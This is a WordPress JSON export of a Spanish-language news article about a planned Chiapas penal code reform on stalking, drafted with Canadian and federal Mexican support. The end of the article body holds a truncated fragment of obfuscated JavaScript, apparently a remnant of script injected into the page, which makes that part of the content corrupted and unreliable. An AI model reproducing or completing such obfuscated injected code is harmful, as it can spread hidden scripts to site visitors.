{"id":5091,"date":"2022-09-14T02:51:38","date_gmt":"2022-09-14T02:51:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5091"},"modified":"2022-09-14T02:51:39","modified_gmt":"2022-09-14T02:51:39","slug":"diputado-raul-bonifaz-presentara-iniciativa-en-materia-de-acecho","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5091","title":{"rendered":"Diputado Ra\u00fal Bonifaz presentar\u00e1 Iniciativa en materia de acecho"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"384\" height=\"226\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0088.jpg\" alt=\"\" class=\"wp-image-5092\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0088.jpg 384w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220913-WA0088-300x177.jpg 300w\" sizes=\"auto, (max-width: 384px) 100vw, 384px\" \/><\/figure>\n\n\n\n<p>\u2022 La iniciativa ser\u00eda el resultado del esfuerzo conjunto entre la secretar\u00eda de gobernaci\u00f3n, el ministerio de Justicia de Canad\u00e1 y la Comisi\u00f3n de Justicia del congreso local.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez Chiapas a 13 de septiembre de 2022.- En un esfuerzo tripartita, la Secretar\u00eda de Gobernaci\u00f3n, el Ministerio de Justicia de Canad\u00e1 y la Comisi\u00f3n de Justicia del Congreso de Chiapas, que preside el diputado Ra\u00fal Bonifaz Moedano, elaboraron la iniciativa en materia de acecho que plantea una reforma al C\u00f3digo Penal de dicha entidad federativa.<\/p>\n\n\n\n<p>De aprobarse las reformas al C\u00f3digo Penal, las cuales presentar\u00e1 el diputado Bonifaz Moedano, el estado de Chiapas ser\u00eda el primero en el pa\u00eds, en legislar reformas en materia de acecho.<\/p>\n\n\n\n<p>Cabe destacar que el acecho es un tipo de violencia que altera de manera relevante la vida cotidiana de las v\u00edctimas, principalmente de las mujeres. Este comportamiento se distingue del acoso y hostigamiento debido a que las conductas no son necesariamente sexuales ni requieren tener una motivaci\u00f3n o finalidad lasciva.<\/p>\n\n\n\n<p>La intromisi\u00f3n indeseable en la vida de otra persona puede generarse a trav\u00e9s de comunicaciones no deseadas o contactos f\u00edsicos no permitidos, lo cual puede causar ansiedad, estr\u00e9s, depresi\u00f3n, repulsi\u00f3n, hipervigilancia y temor en la victima.<\/p>\n\n\n\n<p>Por est\u00e1 raz\u00f3n, el legislador por MORENA, inici\u00f3 los trabajo desde fines del 2021, en el marco del \u2018Proyecto de Cooperaci\u00f3n Canad\u00e1-M\u00e9xico sobre Justicia\u2019, entre la Secretar\u00eda de Gobernaci\u00f3n, a trav\u00e9s de la Unidad de Apoyo al Sistema de Justicia (UASJ), con el Ministerio de Justicia de Canad\u00e1.<\/p>\n\n\n\n<p>De est\u00e1 manera la UASJ ha coordinado los trabajos para elaborar la iniciativa por el que se adiciona el art\u00edculo 237 Bis de dicho c\u00f3digo.<\/p>\n\n\n\n<p>Como antecedente a esta iniciativa, se llev\u00f3 a cabo el 6 de julio de 2022 un taller denominado \u2018Stalking: Reconocer y Denunciar al acecho\u2019 en las instalaciones de la Embajada de Canad\u00e1.<\/p>\n\n\n\n<p>En \u00e9ste, se expusieron los principales elementos del acecho en Canad\u00e1, su regulaci\u00f3n, testimonios y elementos de derecho comparado. Dicho espacio cont\u00f3 con la asistencia virtual de 18 entidades federativas.<\/p>\n\n\n\n<p>La Encuesta Nacional sobre la Din\u00e1mica de las Relaciones en los Hogares (ENDIREH 2016) del Instituto Nacional de Estad\u00edstica y Geograf\u00eda (Inegi) se\u00f1ala que 80 por ciento de los casos de violencia contra las mujeres ocurrieron en espacios p\u00fablicos o comunitarios, que va desde frases ofensivas de tipo sexual, acecho (la han seguido en la calle) y abuso sexual (manoseo, exhibicionismo obsceno), de los cuales 71.4 por ciento de los agresores eran personas desconocidas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 La iniciativa ser\u00eda el resultado del esfuerzo conjunto entre la secretar\u00eda de gobernaci\u00f3n, el ministerio de Justicia de Canad\u00e1 y la Comisi\u00f3n de Justicia del congreso local. Tuxtla Guti\u00e9rrez Chiapas a 13 de septiembre de 2022.- En un esfuerzo tripartita, la Secretar\u00eda de Gobernaci\u00f3n, el Ministerio de Justicia de Canad\u00e1 y la Comisi\u00f3n de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5092,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5091","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5091","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5091"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5091\/revisions"}],"predecessor-version":[{"id":5093,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5091\/revisions\/5093"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5092"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5091"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5091"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5091"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}